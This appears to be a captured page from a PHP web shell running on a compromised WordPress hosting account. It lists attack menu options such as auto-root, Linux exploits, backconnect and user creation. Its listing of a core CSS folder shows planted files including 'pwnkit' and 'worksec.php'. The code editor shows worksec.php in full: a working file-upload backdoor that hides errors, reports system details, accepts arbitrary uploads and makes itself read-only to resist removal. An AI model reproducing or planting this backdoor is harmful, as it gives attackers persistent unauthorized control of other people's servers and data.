Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-includes /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-bar-rtl.css
25.02
KB
-rw-r--r--
admin-bar-rtl.min.css
20.29
KB
-rw-r--r--
admin-bar.css
24.99
KB
-rw-r--r--
admin-bar.min.css
20.29
KB
-rw-r--r--
buttons-rtl.css
12.69
KB
-rw-r--r--
buttons-rtl.min.css
7.96
KB
-rw-r--r--
buttons.css
12.65
KB
-rw-r--r--
buttons.min.css
7.96
KB
-rw-r--r--
classic-themes.css
729
B
-rw-r--r--
classic-themes.min.css
291
B
-rw-r--r--
customize-preview-rtl.css
3.71
KB
-rw-r--r--
customize-preview-rtl.min.css
2.93
KB
-rw-r--r--
customize-preview.css
3.67
KB
-rw-r--r--
customize-preview.min.css
2.92
KB
-rw-r--r--
dashicons.css
60.88
KB
-rw-r--r--
dashicons.min.css
57.62
KB
-rw-r--r--
editor-rtl.css
33.41
KB
-rw-r--r--
editor-rtl.min.css
27.37
KB
-rw-r--r--
editor.css
33.37
KB
-rw-r--r--
editor.min.css
27.36
KB
-rw-r--r--
jquery-ui-dialog-rtl.css
5.86
KB
-rw-r--r--
jquery-ui-dialog-rtl.min.css
4.48
KB
-rw-r--r--
jquery-ui-dialog.css
5.82
KB
-rw-r--r--
jquery-ui-dialog.min.css
4.48
KB
-rw-r--r--
media-views-rtl.css
59.62
KB
-rw-r--r--
media-views-rtl.min.css
48.3
KB
-rw-r--r--
media-views.css
59.58
KB
-rw-r--r--
media-views.min.css
48.29
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-r--r--r--
wp-auth-check-rtl.css
2.45
KB
-rw-r--r--
wp-auth-check-rtl.min.css
1.84
KB
-rw-r--r--
wp-auth-check.css
2.42
KB
-rw-r--r--
wp-auth-check.min.css
1.84
KB
-rw-r--r--
wp-block-template-skip-link-rt...
653
B
-rw-r--r--
wp-block-template-skip-link-rt...
468
B
-rw-r--r--
wp-block-template-skip-link.cs...
617
B
-rw-r--r--
wp-block-template-skip-link.mi...
467
B
-rw-r--r--
wp-embed-template-ie.css
33
B
-rw-r--r--
wp-embed-template-ie.min.css
35
B
-rw-r--r--
wp-embed-template.css
7.92
KB
-rw-r--r--
wp-embed-template.min.css
6.86
KB
-rw-r--r--
wp-empty-template-alert.css
465
B
-rw-r--r--
wp-empty-template-alert.min.cs...
409
B
-rw-r--r--
wp-pointer-rtl.css
3.99
KB
-rw-r--r--
wp-pointer-rtl.min.css
3.18
KB
-rw-r--r--
wp-pointer.css
3.95
KB
-rw-r--r--
wp-pointer.min.css
3.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close